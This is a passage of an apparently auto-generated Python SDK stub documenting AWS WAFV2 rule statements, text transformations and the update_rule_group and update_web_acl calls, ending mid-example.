characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\nPositionalConstraint (string) -- [REQUIRED]The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:\n\nCONTAINS\nThe specified part of the web request must include the value of SearchString , but the location doesn\'t matter.\n\nCONTAINS_WORD\nThe specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:\n\nSearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .\nSearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .\n\n\nEXACTLY\nThe value of the specified part of the web request must exactly match the value of SearchString .\n\nSTARTS_WITH\nThe value of SearchString must appear at the beginning of the specified part of the web request.\n\nENDS_WITH\nThe value of SearchString must appear at the end of the specified part of the web request.\n\n\n\nSqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. 
Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nXssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. 
This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. 
HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nSizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.\nIf you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.\nIf you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. 
The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nComparisonOperator (string) -- [REQUIRED]The operator to use to compare the request part to the size setting.\n\nSize (integer) -- [REQUIRED]The size, in byte, to compare to the request part, after any transformations.\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. 
HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nGeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.\n\nCountryCodes (list) --An array of two-character country codes, for example, [ 'US', 'CN' ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.\n\n(string) --\n\n\n\n\nRuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.\nYou cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the entity.\n\nExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\nIPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .\nEach IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IPSet that this statement references.\n\n\n\nRegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .\nEach regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. 
When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nRateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.\nWhen the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.\nYou can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:\n\nAn IP match statement with an IP set that specified the address 192.0.2.44.\nA string match statement that searches in the User-Agent header for the string BadBot.\n\nIn this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.\nYou cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nLimit (integer) -- [REQUIRED]The limit on requests per 5-minute period for a single originating IP address. 
If the statement includes a ScopeDownStatement , this limit is applied only to the requests that match the statement.\n\nAggregateKeyType (string) -- [REQUIRED]Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.\n\nScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.\n\n\n\nAndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with AND logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nOrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with OR logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nNotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .\n\nStatement (dict) --The statement to negate. You can use any statement that can be nested.\n\n\n\nManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .\nYou can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nVendorName (string) -- [REQUIRED]The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n\nName (string) -- [REQUIRED]The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n\nExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . 
This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\n\n\nAction (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.\nThis is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nYou must specify either this Action setting or the rule OverrideAction setting, but not both:\n\nIf the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.\nIf the rule statement references a rule group, use the override action setting and not this action setting.\n\n\nBlock (dict) --Instructs AWS WAF to block the web request.\n\nAllow (dict) --Instructs AWS WAF to allow the web request.\n\nCount (dict) --Instructs AWS WAF to count the web request and allow it.\n\n\n\nOverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nSet the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.\nIn a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:\n\nIf the rule statement references a rule group, use this override action setting and not the action setting.\nIf the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.\n\n\nCount (dict) --Override the rule action setting to count.\n\nNone (dict) --Don\'t override the rule action setting.\n\n\n\nVisibilityConfig (dict) -- [REQUIRED]Defines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n\n\n\n\n
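As a concrete illustration of the Rules structure described above, a single ByteMatchStatement rule that blocks requests whose User-Agent header contains BadBot might look like the following sketch (the rule and metric names are hypothetical; as noted above, the SDK base64-encodes SearchString automatically):

rules = [
    {
        'Name': 'block-badbot',  # hypothetical rule name
        'Priority': 0,
        'Statement': {
            'ByteMatchStatement': {
                'SearchString': b'BadBot',  # raw bytes; the SDK base64-encodes this value
                'FieldToMatch': {
                    'SingleHeader': {'Name': 'User-Agent'}
                },
                'TextTransformations': [
                    {'Priority': 0, 'Type': 'NONE'}
                ],
                'PositionalConstraint': 'CONTAINS'
            }
        },
        # This rule does not reference a rule group, so Action (not OverrideAction) is set.
        'Action': {'Block': {}},
        'VisibilityConfig': {
            'SampledRequestsEnabled': True,
            'CloudWatchMetricsEnabled': True,
            'MetricName': 'blockBadBot'  # hypothetical metric name
        }
    }
]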
:type VisibilityConfig: dict
:param VisibilityConfig: [REQUIRED]\nDefines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
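The get/update/retry cycle described above might be wrapped as in the following sketch (the helper name and its arguments are placeholders; get_rule_group returns the LockToken that update_rule_group expects):

def update_rule_group_with_retry(client, name, scope, rule_group_id, rules, visibility_config):
    # Fetch the current state to obtain a LockToken for optimistic locking.
    current = client.get_rule_group(Name=name, Scope=scope, Id=rule_group_id)
    try:
        return client.update_rule_group(
            Name=name, Scope=scope, Id=rule_group_id,
            Rules=rules, VisibilityConfig=visibility_config,
            LockToken=current['LockToken'])
    except client.exceptions.WAFOptimisticLockException:
        # The entity changed since it was retrieved: perform another get and
        # retry once with the new token, as described above.
        current = client.get_rule_group(Name=name, Scope=scope, Id=rule_group_id)
        return client.update_rule_group(
            Name=name, Scope=scope, Id=rule_group_id,
            Rules=rules, VisibilityConfig=visibility_config,
            LockToken=current['LockToken'])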
:rtype: dict
Returns
Response Syntax
{
'NextLockToken': 'string'
}
Response Structure
(dict) --
NextLockToken (string) --
A token used for optimistic locking. AWS WAF returns this token to your update requests. You use NextLockToken in the same manner as you use LockToken .
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextLockToken': 'string'
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def update_web_acl(Name=None, Scope=None, Id=None, DefaultAction=None, Description=None, Rules=None, VisibilityConfig=None, LockToken=None):
"""
Updates the specified WebACL .
A Web ACL defines a collection of rules to use to inspect and control web requests. Each rule has an action defined (allow, block, or count) for requests that match the statement of the rule. In the Web ACL, you assign a default action to take (allow, block) for any request that does not match any of the rules. The rules in a Web ACL can be a combination of the types Rule , RuleGroup , and managed rule group. You can associate a Web ACL with one or more AWS resources to protect. The resources can be Amazon CloudFront, an Amazon API Gateway API, or an Application Load Balancer.
See also: AWS API Documentation
Exceptions
:example: response = client.update_web_acl(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
DefaultAction={
'Block': {}
,
'Allow': {}
},
Description='string',
Rules=[
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
